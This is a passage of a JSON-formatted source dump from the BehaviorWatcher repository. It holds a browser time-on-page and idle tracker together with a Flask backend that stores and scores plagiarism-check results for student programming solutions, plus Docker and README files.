undefined;\n\t\telse\n\t\t\treturn timeInMs / 1000;\n\t}\n\n\tgetTimeOnPageInMilliseconds(pageName) {\n\t\tif (!pageName)\n\t\t\tpageName = this.currentPageName;\n\n\t\tlet totalTimeOnPage = 0;\n\n\t\tlet arrayOfTimes = this.startStopTimes[pageName];\n\t\tif (arrayOfTimes === undefined)\n\t\t\treturn;\n\n\t\tlet timeSpentOnPageInSeconds = 0;\n\t\tfor (let i = 0; i < arrayOfTimes.length; i++) {\n\t\t\tlet startTime = arrayOfTimes[i].startTime;\n\t\t\tlet stopTime = arrayOfTimes[i].stopTime;\n\t\t\tif (stopTime === undefined)\n\t\t\t\tstopTime = new Date();\n\n\t\t\tlet difference = stopTime - startTime;\n\t\t\ttimeSpentOnPageInSeconds += (difference);\n\t\t}\n\n\t\ttotalTimeOnPage = Number(timeSpentOnPageInSeconds);\n\t\treturn totalTimeOnPage;\n\t}\n\n\tsetIdleDurationInSeconds(duration) {\n\t\tlet durationFloat = parseFloat(duration);\n\n\t\tif (isNaN(durationFloat) === false)\n\t\t\tthis.idleTimeoutMs = duration * 1000;\n\t\telse 
{\n\t\t\tthrow {\n\t\t\t\tname: \"InvalidDurationException\",\n\t\t\t\tmessage: \"An invalid duration time (\" + duration + \") was provided.\"\n\t\t\t};\n\t\t}\n\t}\n\n\tsetCurrentPageName(pageName) {\n\t\tthis.currentPageName = pageName;\n\t}\n\n\tuserActivityDetected() {\n\t\tif (this.isUserCurrentlyIdle)\n\t\t\tthis.triggerUserHasReturned();\n\n\t\tthis.resetIdleCountdown();\n\t}\n\n\tresetIdleCountdown() {\n\t\tthis.isUserCurrentlyIdle = false;\n\t\tthis.currentIdleTimeMs = 0;\n\t}\n\n\ttriggerUserHasReturned() {\n\t\tif (!this.isUserCurrentlyOnPage) {\n\t\t\tthis.isUserCurrentlyOnPage = true;\n\t\t\tthis.resetIdleCountdown();\n\n\t\t\tfor (let i = 0; i < this.userReturnCallbacks.length; i++) {\n\t\t\t\tlet userReturnedCallback = this.userReturnCallbacks[i];\n\t\t\t\tlet numberTimes = userReturnedCallback.numberOfTimesToInvoke;\n\n\t\t\t\tif (isNaN(numberTimes) || (numberTimes === undefined) || numberTimes > 0) {\n\t\t\t\t\tuserReturnedCallback.numberOfTimesToInvoke -= 1;\n\t\t\t\t\tuserReturnedCallback.callback();\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tthis.startTimer();\n\t}\n\t\n\ttriggerUserHasLeftPageOrGoneIdle() {\n\t\tif (this.isUserCurrentlyOnPage) {\n\t\t\tthis.isUserCurrentlyOnPage = false;\n\n\t\t\tfor (let i = 0; i < this.userLeftCallbacks.length; i++) {\n\t\t\t\tlet userHasLeftCallback = this.userLeftCallbacks[i];\n\t\t\t\tlet numberTimes = userHasLeftCallback.numberOfTimesToInvoke;\n\n\t\t\t\tif (isNaN(numberTimes) || (numberTimes === undefined) || numberTimes > 0) {\n\t\t\t\t\tuserHasLeftCallback.numberOfTimesToInvoke -= 1;\n\t\t\t\t\tuserHasLeftCallback.callback();\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tthis.stopAllTimers();\n\t}\n\n\tcheckIdleState() {\n\t\tfor (let i = 0; i < this.timeElapsedCallbacks.length; i++) {\n\t\t\tif (this.timeElapsedCallbacks[i].pending && this.getTimeOnPageInSeconds() > this.timeElapsedCallbacks[i].timeInSeconds) {\n\t\t\t\tthis.timeElapsedCallbacks[i].callback();\n\t\t\t\tthis.timeElapsedCallbacks[i].pending = false;\n\t\t\t}\n\t\t}\n\n\t\tif (this.isUserCurrentlyIdle === false && this.currentIdleTimeMs > this.idleTimeoutMs) {\n\t\t\tthis.isUserCurrentlyIdle = true;\n\t\t\tthis.triggerUserHasLeftPageOrGoneIdle();\n\t\t} else\n\t\t\tthis.currentIdleTimeMs += this.checkIdleStateRateMs;\n\t}\n\n\tlistenEvents(trackWhenUserLeavesPage, trackWhenUserGoesIdle) {\n\t\tif (trackWhenUserLeavesPage)\n\t\t\tthis.listenForUserLeavesOrReturnsEvents();\n\n\t\tif (trackWhenUserGoesIdle)\n\t\t\tthis.listenForIdleEvents();\n\t}\n\n\tlistenForUserLeavesOrReturnsEvents() {\n\t\tlet visibilityChangeEventName = undefined;\n\t\tlet hiddenPropName = undefined;\n\n\t\tif (typeof document.hidden !== \"undefined\") {\n\t\t\tthis.hiddenPropName = \"hidden\";\n\t\t\tthis.visibilityChangeEventName = \"visibilitychange\";\n\t\t} else if (typeof document.mozHidden !== \"undefined\") {\n\t\t\tthis.hiddenPropName = \"mozHidden\";\n\t\t\tthis.visibilityChangeEventName = \"mozvisibilitychange\";\n\t\t} else if (typeof document.msHidden !== \"undefined\") {\n\t\t\tthis.hiddenPropName = \"msHidden\";\n\t\t\tthis.visibilityChangeEventName = \"msvisibilitychange\";\n\t\t} else if (typeof document.webkitHidden !== \"undefined\") {\n\t\t\tthis.hiddenPropName = \"webkitHidden\";\n\t\t\tthis.visibilityChangeEventName = \"webkitvisibilitychange\";\n\t\t}\n\n\t\tdocument.addEventListener(this.visibilityChangeEventName, () => {\n\t\t\tif (document[this.hiddenPropName])\n\t\t\t\tthis.triggerUserHasLeftPageOrGoneIdle();\n\t\t\telse\n\t\t\t\tthis.triggerUserHasReturned();\n\t\t}, 
false);\n\n\t\twindow.addEventListener('blur', () => {\n\t\t\tthis.triggerUserHasLeftPageOrGoneIdle();\n\t\t});\n\n\t\twindow.addEventListener('focus', () => {\n\t\t\tthis.triggerUserHasReturned();\n\t\t});\n\t}\n\n\tlistenForIdleEvents() {\n\t\tdocument.addEventListener(\"mousemove\", () => { this.userActivityDetected(); });\n\t\tdocument.addEventListener(\"keyup\", () => { this.userActivityDetected(); });\n\t\tdocument.addEventListener(\"touchstart\", () => { this.userActivityDetected(); });\n\t\twindow.addEventListener(\"scroll\", () => { this.userActivityDetected(); });\n\n\t\tsetInterval(() => {\n\t\t\tif (this.isUserCurrentlyIdle !== true)\n\t\t\t\tthis.checkIdleState();\n\t\t}, this.checkIdleStateRateMs);\n\t}\n\n\tsetUpConnection(host) {\n\t\tthis.host = host;\n\n\t\t//window.addEventListener('pagehide', () => {this.sendCurrentTime()});\n\t\t//window.addEventListener('beforeunload', () => {this.sendCurrentTime()});\n\n\t\t$(window).on('beforeunload', () => {this.sendCurrentTime()});\n\t\t//$(window).on('unload', () => {this.sendCurrentTime()});\n\t}\n\n\tsendCurrentTime() {\n\t\tconst data = JSON.stringify({\n\t\t\t'userId': 12345,\n\t\t\t'taskId': 666,\n\t\t\t'secondsOnPage': this.getTimeOnPageInSeconds(),\n\t\t\t'taskCopied': true\n\t\t});\n\n\t\tif (navigator.sendBeacon) {\n\t\t\tnavigator.sendBeacon(this.host, new Blob([data], {type: 'application/json'}));\n\t\t} else {\n\t\t\t/*let xhr = new XMLHttpRequest();\n\t\t\txhr.open(\"POST\", host);\n\t\t\txhr.setRequestHeader(\"Content-Type\", \"application/json;charset=UTF-8\");\n\t\t\txhr.onopen = () => {xhr.send(data)};*/\n\n\t\t\t$.post({\n\t\t\t\turl: '/metric',\n\t\t\t\tdataType: 'json',\n\t\t\t\tcontentType: 'application/json; charset=utf-8',\n\t\t\t\tdata: data,\n\t\t\t\tsuccess: () => {}\n\t\t\t});\n\t\t}\n\t}\n};\n"
},
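The Watcher class accounts time as a list of start/stop intervals per page, closing any still-open interval at "now" when a total is requested (getTimeOnPageInMilliseconds). The same bookkeeping reduced to a few lines of Python:

```python
from datetime import datetime, timedelta

# (start, stop) pairs; None marks an interval that is still running.
intervals = [
    (datetime(2021, 10, 2, 12, 0, 0), datetime(2021, 10, 2, 12, 0, 40)),
    (datetime(2021, 10, 2, 12, 5, 0), None),
]
now = datetime(2021, 10, 2, 12, 5, 30)
total = sum(((stop or now) - start for start, stop in intervals), timedelta())
print(total.total_seconds())  # 70.0 = closed 40s interval + 30s of the open one
```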
{
"alpha_fraction": 0.5258092880249023,
"alphanum_fraction": 0.556430459022522,
"avg_line_length": 26.214284896850586,
"blob_id": "fa3712e8e23c02c3d6da1ab470045bb8a31fe0de",
"content_id": "2452215444bfade9efdcf0ee7604ae2e124f1c93",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1143,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 42,
"path": "/backend/generator.py",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "import json\nimport random\n\nfrom datetime import date\n\n\ndef generate_users():\n random.seed(1234)\n users = []\n\n for i in range(5000):\n user = {\n 'id': i,\n 'task_id': random.randrange(3),\n 'language_id': random.randrange(0, 3),\n 'sending_task_time': date(year=2021 - random.randrange(2), month=8 - random.randrange(2),\n day=1 + random.randrange(25)),\n 'test_passed': bool(random.randrange(2)),\n 'stole_from': [random.randrange(1000) for i in range(random.randrange(4))],\n 'reputation': int(random.random() * 100),\n 'course_year': random.randrange(4) + 1,\n 'faculty_id': random.randrange(3),\n 'university_id': random.randrange(3)\n }\n\n users.append(user)\n\n return users\n\n\ndef save_users_to_file(filename, users):\n f = open(filename + '.json', 'w')\n f.write(json.dumps(users, indent=4, sort_keys=True, default=str))\n f.close()\n\n\ndef load_users_from_file(filename):\n f = open(filename + '.json', 'r')\n users = json.load(f)\n f.close()\n\n return users\n"
},
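generator.py produces a deterministic batch of fake users (the RNG is seeded with 1234) and serializes dates via default=str, so dates come back as strings after a round trip. A usage sketch with the module's own helpers:

```python
from generator import generate_users, save_users_to_file, load_users_from_file

users = generate_users()
save_users_to_file("users", users)          # writes users.json
loaded = load_users_from_file("users")
print(len(loaded), type(loaded[0]["sending_task_time"]))  # 5000 <class 'str'>
```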
{
"alpha_fraction": 0.49050086736679077,
"alphanum_fraction": 0.5874112248420715,
"avg_line_length": 31.568750381469727,
"blob_id": "327eb96fed80df908a19692f8cb22c8d8699a3a9",
"content_id": "15f0079f118ee8435bcbe666ccca4fce84ab5145",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5211,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 160,
"path": "/backend/verifications.py",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "\"\"\"\nHTTP handlers for /verification route\n\"\"\"\nimport json\nimport filter\n\nfrom thirdparty import db\nfrom models import (Verification, Error, VerificationSchema, ErrorSchema)\n\nerrorSchema = ErrorSchema()\nverificationSchema = VerificationSchema()\n\napiResponse = \"\"\"{\n \"Version\": \"1\",\n \"SolutionID\": \"original.py\",\n \"MaxSimilarity\": 0.9806427276796765,\n \"MaxSimilaritySolutionID\": \"different_comments.py\",\n \"Verdict\": \"CLEAR POSITIVE\",\n \"Scores\": [\n {\n \"SolutionID\": \"different_comments.py\",\n \"TotalScore\": 0.9806427276796765,\n \"TextBasedScore\": 1,\n \"TokenBasedScore\": 0.9955476522445679,\n \"MetricBasedScore\": 0.9444444444444444,\n \"BinaryBasedScore\": 0.9825788140296936,\n \"TreeBasedScore\": null\n },\n {\n \"SolutionID\": \"reformatted.py\",\n \"TotalScore\": 0.971757612294621,\n \"TextBasedScore\": 0.9889094233512878,\n \"TokenBasedScore\": 0.9714533090591431,\n \"MetricBasedScore\": 0.9444444444444444,\n \"BinaryBasedScore\": 0.9822232723236084,\n \"TreeBasedScore\": null\n },\n {\n \"SolutionID\": \"renamed_variables.py\",\n \"TotalScore\": 0.9180482551455498,\n \"TextBasedScore\": 0.7295423150062561,\n \"TokenBasedScore\": 1,\n \"MetricBasedScore\": 1,\n \"BinaryBasedScore\": 0.942650705575943,\n \"TreeBasedScore\": null\n },\n {\n \"SolutionID\": \"reordered.py\",\n \"TotalScore\": 0.9036459699273109,\n \"TextBasedScore\": 0.8485981523990631,\n \"TokenBasedScore\": 0.9040516316890717,\n \"MetricBasedScore\": 1,\n \"BinaryBasedScore\": 0.861934095621109,\n \"TreeBasedScore\": null\n },\n {\n \"SolutionID\": \"with_additional_imports.py\",\n \"TotalScore\": 0.8646872325075997,\n \"TextBasedScore\": 0.8857616186141968,\n \"TokenBasedScore\": 0.9573742747306824,\n \"MetricBasedScore\": 0.8888888888888888,\n \"BinaryBasedScore\": 0.7267241477966309,\n \"TreeBasedScore\": null\n },\n {\n \"SolutionID\": \"with_functions.py\",\n \"TotalScore\": 0.5494582574400637,\n \"TextBasedScore\": 0.4490084946155548,\n \"TokenBasedScore\": 0.679684579372406,\n \"MetricBasedScore\": 0.7222222222222222,\n \"BinaryBasedScore\": 0.3469177335500717,\n \"TreeBasedScore\": null\n }\n ]\n}\"\"\"\n\n\ndef get_one(solution_id):\n \"\"\"\n Respond to a GET request for /verifications/{solutionId}\n Returns specified verification\n\n :param solution_id Id of the verification to return\n :return (verification, 200) | (404)\n \"\"\"\n\n\n# verification = Verification.query.filter(Verification.id == solutionId).one_or_none()\n# if verification is None:\n# errorSchema.dump(Error(f\"Metric with metricId: {solutionId} does not exists\")), 400\n\n# return verificationSchema.dump(verification), 200\n\n# 1. Get solution entity with userId, task, etc from other DB\n# 2. Get another data\n# 4. Calculate something\n# 5. ...\n# 6. Magic\n# 7. Profit\n\n# 1. K\n# 2. I\n# 4. L\n# 5. L\n# 6. M\n# 7. E\n\n\ndef post(solution_id):\n try:\n # 1. Get solution entity with userId, task, etc from other DB\n solution_id = 1\n\n # 2. filter users (filter.py)\n filter(solution_id)\n\n # 3. call API of other module\n\n # apiResponse = request(...) 
# TODO: real request\n response = json.loads(apiResponse)\n for i in response['Scores']:\n verification = Verification(**{\n 'source_solution_id': i['SolutionID'],\n 'destination_solution_id': solution_id,\n 'source_user_id': 4, # TODO: change to real id\n 'destination_user_id': 6, # TODO: change to real id\n 'task_id': 59, # TODO: change to real id\n 'verdict_of_module': response['Verdict'],\n 'total_score': i['TotalScore'],\n 'text_based_score': i['TextBasedScore'],\n 'token_based_score': i['TokenBasedScore'],\n 'metric_based_score': i['MetricBasedScore'],\n 'binary_based_score': i['BinaryBasedScore'],\n 'tree_based_score': i['TreeBasedScore']\n })\n\n db.session.add(verification)\n\n # 4. save result to our DB (especially to Verification TABLE)\n db.session.commit()\n\n return errorSchema.dump(Error(\"OK\")), 200\n except Exception as e:\n print(str(e)) # TODO: delete\n return errorSchema.dump(Error(\"Unexpected error\")), 500\n\n\ndef patch(solution_id, body):\n try:\n if body.get('is_plagiarism'):\n Verification.query.filter(Verification.destination_solution_id == solution_id).update(\n {Verification.verdict_of_human: True})\n else:\n Verification.query.filter(Verification.destination_solution_id == solution_id).delete();\n\n db.session.commit()\n return errorSchema.dump(Error(\"OK\")), 200\n except Exception as e:\n print(e)\n return errorSchema.dump(Error(\"Unexpected error\")), 500\n"
},
{
"alpha_fraction": 0.6756756901741028,
"alphanum_fraction": 0.6949806809425354,
"avg_line_length": 27.77777862548828,
"blob_id": "75ecb8e8c8e2056da2725e77cadb51508e2ad73e",
"content_id": "feafcabca39dcc82a2334bfc18ba5b368d38035b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 348,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 9,
"path": "/frontend/README.md",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "# Frontend\n\n## Развертывание \n\n### server.py\n\n0. (Опционально) Установить переменные окружения ```APPLICATION_HOST``` и ```APPLICATION_PORT```\n1. Подтянуть зависимости: ``` $ pip3 install -r requirements.txt```\n2. Запустить сервер: ``` $ python3 server.py```\n"
},
{
"alpha_fraction": 0.7138461470603943,
"alphanum_fraction": 0.7184615135192871,
"avg_line_length": 33.21052551269531,
"blob_id": "5eb81487b69486811d5070e2baa7eed7e4fd69f2",
"content_id": "6dd7bcdbdc4a9a320368e8a4fad578046508047f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 935,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 19,
"path": "/README.md",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "# BehaviorWatcher\n\n## Структура проекта\n\n* ```/dist``` + ```index.html``` - для просмотра swagger на github pages\n* ```/backend``` - независимый сервер для работы BehaviorWatcher\n* ```/frontend``` - независимый сервер для проверки работы скрипта, который собирает статистику и отправляет на сервер\n\n## Развёртывание\n\n### С использованием Docker\n\n1. Ставим на Вашу ОС [Docker](https://www.docker.com/) и [docker-compose](https://docs.docker.com/compose/)\n2. Запускаем контейнеры: ``` $ docker-compose up --build -d```\n3. Проверяем их статус: ``` $ docker-compose ps```\n\n### Ручное\n\n*Следуем инструкции по развертыванию для каждого отдельного сервиса*\n"
},
{
"alpha_fraction": 0.5106382966041565,
"alphanum_fraction": 0.585106372833252,
"avg_line_length": 15.588234901428223,
"blob_id": "e5ea2deca6b71b61c858a3577ec71ce0878ab066",
"content_id": "77e6f8681589f156445d2d5afc89d9d0a61f0158",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "YAML",
"length_bytes": 282,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 17,
"path": "/docker-compose.yml",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "version: \"3\"\n\nservices:\n backend:\n build: backend\n ports:\n - \"5000:5000\"\n restart: \"always\"\n # TODO: add volume for persistence\n\n frontend:\n build: frontend\n environment:\n - APPLICATION_HOST=0.0.0.0\n ports:\n - \"8080:8080\"\n restart: \"always\"\n"
},
{
"alpha_fraction": 0.6889312863349915,
"alphanum_fraction": 0.694656491279602,
"avg_line_length": 36.42856979370117,
"blob_id": "d2420b00f97af96ac322c1087b71e644e1af84bd",
"content_id": "251123b10e85de61ad4b8761f1c72818f607ff97",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 524,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 14,
"path": "/backend/metrics.py",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "from models import Verification\n\n\ndef get_user_rating(user_id):\n sources = len(Verification.query.filter(\n Verification.destination_user_id.like(user_id) & Verification.verdict_of_human.is_(True)).all())\n destinations = len(Verification.query.filter(\n Verification.source_user_id.like(user_id) & Verification.verdict_of_human.is_(True)).all())\n\n if sources + destinations == 0:\n return 0\n\n sources = sources * sources\n return round((destinations - sources) / (destinations + sources), 2)\n"
},
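The rating squares the count of confirmed cases where the user is the copier before normalizing, so a few confirmed offences outweigh many cases of being copied from. Worked by hand (a pure-Python restatement of the formula, not the ORM queries):

```python
def rating(copied, copied_from):
    # `copied` plays the role of `sources` in metrics.py (it gets squared).
    if copied + copied_from == 0:
        return 0
    s2 = copied * copied
    return round((copied_from - s2) / (copied_from + s2), 2)

print(rating(0, 5))  # 1.0   only ever copied *from*
print(rating(1, 5))  # 0.67  one confirmed offence
print(rating(3, 5))  # -0.29 squaring makes offences dominate
```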
{
"alpha_fraction": 0.6887481808662415,
"alphanum_fraction": 0.689235270023346,
"avg_line_length": 32.1129035949707,
"blob_id": "984891fa1a0e7f49f5809704a433fb63d6cab153",
"content_id": "4992e35966256ce1a60f2feed168fe20d98089d9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2053,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 62,
"path": "/backend/models.py",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "from dataclasses import dataclass\nfrom thirdparty import db, ma\n\n\nclass Metric(db.Model):\n # __tablename__ = 'metric'\n\n # while constructing new object don't forget to include required key parameters\n id = db.Column(db.Integer, primary_key=True)\n user_id = db.Column(db.Integer, nullable=False)\n task_id = db.Column(db.Integer, nullable=False)\n reading_time = db.Column(db.Integer, server_default=db.text('0'))\n task_copied = db.Column(db.Boolean, server_default=db.false())\n task_viewed = db.Column(db.Boolean, server_default=db.false())\n\n # Unique pair of (user_id, task_id)\n __table_args__ = (db.UniqueConstraint('user_id', 'task_id', name='_user_task_uc'),) # tuple\n\n\nclass Verification(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n source_solution_id = db.Column(db.Integer, nullable=False)\n destination_solution_id = db.Column(db.Integer, nullable=False)\n\n source_user_id = db.Column(db.Integer, nullable=False)\n destination_user_id = db.Column(db.Integer, nullable=False)\n task_id = db.Column(db.Integer, nullable=False)\n\n verdict_of_module = db.Column(db.String, nullable=True)\n verdict_of_human = db.Column(db.Boolean, server_default=db.false())\n\n total_score = db.Column(db.Float, nullable=True)\n text_based_score = db.Column(db.Float, nullable=True)\n tree_based_score = db.Column(db.Float, nullable=True)\n token_based_score = db.Column(db.Float, nullable=True)\n metric_based_score = db.Column(db.Float, nullable=True)\n binary_based_score = db.Column(db.Float, nullable=True)\n\n __table_args__ = (\n db.UniqueConstraint('source_solution_id', 'destination_solution_id', name='_source_destination_uc'),\n ) # tuple\n\n\n@dataclass\nclass Error:\n message: str\n\n\nclass ErrorSchema(ma.Schema):\n message = ma.Str()\n\n\nclass MetricSchema(ma.SQLAlchemyAutoSchema):\n class Meta:\n model = Metric\n include_fk = True\n\n\nclass VerificationSchema(ma.SQLAlchemyAutoSchema):\n class Meta:\n model = Verification\n include_fk = True\n"
},
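models.py pairs each table with an auto-generated Marshmallow schema, and the composite unique constraints are what the controllers rely on for upsert-style behavior. A minimal round trip against an in-memory SQLite database (a sketch; it assumes the repo's thirdparty and models modules are importable):

```python
from flask import Flask
from thirdparty import db, ma
from models import Metric, MetricSchema

app = Flask(__name__)
app.config["SQLALCHEMY_DATABASE_URI"] = "sqlite://"  # in-memory database
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
db.init_app(app)
ma.init_app(app)

with app.app_context():
    db.create_all()
    db.session.add(Metric(user_id=1, task_id=2, reading_time=10))
    db.session.commit()
    print(MetricSchema().dump(Metric.query.first()))
```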
{
"alpha_fraction": 0.7085427045822144,
"alphanum_fraction": 0.7286432385444641,
"avg_line_length": 14.307692527770996,
"blob_id": "d62a2dd8ed3a54424342fb3ad6457acb5bc32e95",
"content_id": "5029483c0da30b24dd398b2080dfd9413fe34902",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 199,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 13,
"path": "/frontend/Dockerfile",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "FROM python:3.9-slim\n\nENV PYTHONUNBUFFERED 1\n\nWORKDIR /app\n\nCOPY requirements.txt ./\nRUN pip install -r requirements.txt\n\nCOPY . .\nCMD [\"python3\", \"server.py\"]\n\n# TODO: use wsgi-server in production\n"
},
{
"alpha_fraction": 0.7109004855155945,
"alphanum_fraction": 0.7251184582710266,
"avg_line_length": 14.071428298950195,
"blob_id": "5c399d159b92a6902f37dba2d813bf2ef566ecef",
"content_id": "ff30b843399b7f31fac7422f2a60da133494833d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 211,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 14,
"path": "/backend/Dockerfile",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "FROM python:3.9-slim\n\nENV PYTHONUNBUFFERED 1\n\nWORKDIR /app\nRUN pip install pipenv\n\nCOPY Pipfile Pipfile.lock ./\nRUN pipenv install\n\nCOPY . .\nCMD [\"pipenv\", \"run\", \"start\"]\n\n# TODO: use wsgi-server in production\n"
},
{
"alpha_fraction": 0.6944444179534912,
"alphanum_fraction": 0.7083333134651184,
"avg_line_length": 29.85714340209961,
"blob_id": "0d64ce964c333ce0c22500e3eafaa23cc718cb57",
"content_id": "5624be7165aa91e2f21aaa2593f5f771ed180cd5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 310,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 7,
"path": "/backend/README.md",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "# Backend\n\n## Развертывание \n\n1. Установить pipenv: ``` $ pip install pipenv```\n2. Установить зависимости ``` $ pipenv install```\n3. Приложение запускается с использованием окружения через ``` $ pipenv run start```\n"
},
{
"alpha_fraction": 0.5961995124816895,
"alphanum_fraction": 0.6508313417434692,
"avg_line_length": 21.157894134521484,
"blob_id": "671788dfb598743a364cffb69175d20b7769e987",
"content_id": "a13308bee667d292c4b8cd014bf95af13ef322cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TOML",
"length_bytes": 421,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 19,
"path": "/backend/Pipfile",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "[[source]]\nurl = \"https://pypi.org/simple\"\nverify_ssl = true\nname = \"BehaviorWatcher\"\n\n[packages]\nflask = \"==1.1.4\"\nconnexion = {extras = [\"swagger-ui\"], version = \"==2.9.0\"}\nflask-sqlalchemy = \"==2.5.1\"\nflask-marshmallow = \"==0.14.0\"\nmarshmallow-sqlalchemy = \"==0.26.1\"\npython-dotenv = \"*\"\n\n[requires]\npython_version = \"3.9\"\n\n[scripts]\nstart = \"pipenv run python server.py\"\nlint = \"flake8 --exclude=tests --ignore=E121\"\n"
},
{
"alpha_fraction": 0.6381818056106567,
"alphanum_fraction": 0.6463636159896851,
"avg_line_length": 17.33333396911621,
"blob_id": "3f03a6f93c1e3f63d5f2c6d2309d293c912fac0f",
"content_id": "4c2011324efde4e743861b25f3b754af379471db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1100,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 60,
"path": "/frontend/server.py",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "from os import environ\n\nfrom flask import Flask\nfrom flask import jsonify\nfrom flask import request\nfrom flask import abort\nfrom flask import render_template\nfrom flask import send_from_directory\n\napp = Flask(__name__, static_url_path='')\n\napp.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0\n\n\[email protected]('/js/<path:path>')\ndef send_js(path):\n return send_from_directory('js', path)\n\n\nreadingTime = 0\n\n\[email protected]('/metric', methods=['GET'])\ndef get_metric():\n global readingTime\n\n return jsonify({\n 'reading_time': readingTime,\n 'sdf': False\n })\n\n\[email protected]('/metric', methods=['POST'])\ndef post_metric():\n if not request.is_json:\n abort(400)\n\n data = request.json\n print(data)\n\n global readingTime\n readingTime += int(data['reading_time'])\n\n return jsonify(data)\n\n\[email protected]('/', methods=['GET'])\ndef index():\n return render_template('index.html')\n\n\ndef main():\n host = str(environ.get(\"APPLICATION_HOST\", \"netx.ru\"))\n port = int(environ.get(\"APPLICATION_PORT\", 8080))\n\n app.run(host=host, port=port)\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6661333441734314,
"alphanum_fraction": 0.6751999855041504,
"avg_line_length": 31.327587127685547,
"blob_id": "a183818d51f8698a223e7050a0d01b79ee3b5831",
"content_id": "46ab86ed0a910006d8a184bfa7bd40fdde42606c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3750,
"license_type": "no_license",
"max_line_length": 163,
"num_lines": 116,
"path": "/backend/filter.py",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "import sys\nimport metrics\n\nfrom thirdparty import db, fetch\nfrom models import Verification\n\nSUSPECT_AMOUNT = 30\n\nLAST_SOLUTIONS_RATIO = 0.8\nRATING_RATIO = 0.2\n\nLAST_SOLUTIONS_AMOUNT = round(SUSPECT_AMOUNT * LAST_SOLUTIONS_RATIO)\nRATING_AMOUNT = round(SUSPECT_AMOUNT * RATING_RATIO)\n\n\ndef remove_solutions_by_id(solutions, ids):\n l = []\n\n for solution in solutions:\n if solution['Id'] not in ids:\n l.append(solution)\n\n solutions.clear()\n solutions.extend(l)\n\n\ndef get_priority_solutions_ids(solutions):\n # TODO: Change 5 to target.user_id\n priority_verifications = Verification.query.filter(\n Verification.destination_user_id.like(5) & Verification.verdict_of_human.is_(True)).all()\n priority_users_ids = set([i.source_user_id for i in priority_verifications])\n\n priority_solutions_ids = []\n for solution in solutions:\n if solution['OwnerId'] in priority_users_ids:\n priority_solutions_ids.append(solution['Id'])\n\n return priority_solutions_ids\n\n\ndef get_last_solutions_since(date, solutions):\n solutions.sort(reverse=True, key=lambda i: i['CreatedAt'])\n\n start_index = -1\n for i, solution in enumerate(solutions):\n if solution['CreatedAt'] <= date:\n start_index = i\n break\n\n if start_index == -1:\n return []\n\n return solutions[start_index:]\n\n\ndef get_top_solutions_ids_by_rating(solutions):\n users_ratings = {}\n for id in set([i['OwnerId'] for i in solutions]):\n users_ratings[id] = metrics.get_user_rating(id)\n\n for i in solutions:\n i['Rating'] = users_ratings[i['OwnerId']]\n\n solutions.sort(reverse=True, key=lambda i: i['Rating'])\n\n top_solutions_ids = []\n for solution in solutions[0:RATING_AMOUNT]:\n # if solution['Rating'] == 0: # TODO: uncomment\n # break\n\n top_solutions_ids.append(solution['Id'])\n\n return top_solutions_ids\n\n\ndef main(target_solution_id):\n # TODO: Use real target solution id\n # target_solution = db.engine.execute(\"SELECT * FROM Solution WHERE Id=:id FailedTest IS NULL\", {'id': target_solution_id}).first()\n target_solution = fetch(db.engine.execute(\n \"SELECT * FROM Solution WHERE TestTaskId='ff1636d5-0aab-479c-9aa2-b14271d8cdf2' AND FailedTest IS NULL LIMIT 1\"))\n if len(target_solution) == 0:\n return\n target_solution = target_solution[0]\n\n solutions = fetch(db.engine.execute(\n \"SELECT Id, OwnerId, CreatedAt FROM Solution WHERE FailedTest IS NULL AND OwnerId<>:user_id AND TestTaskId=:task_id AND 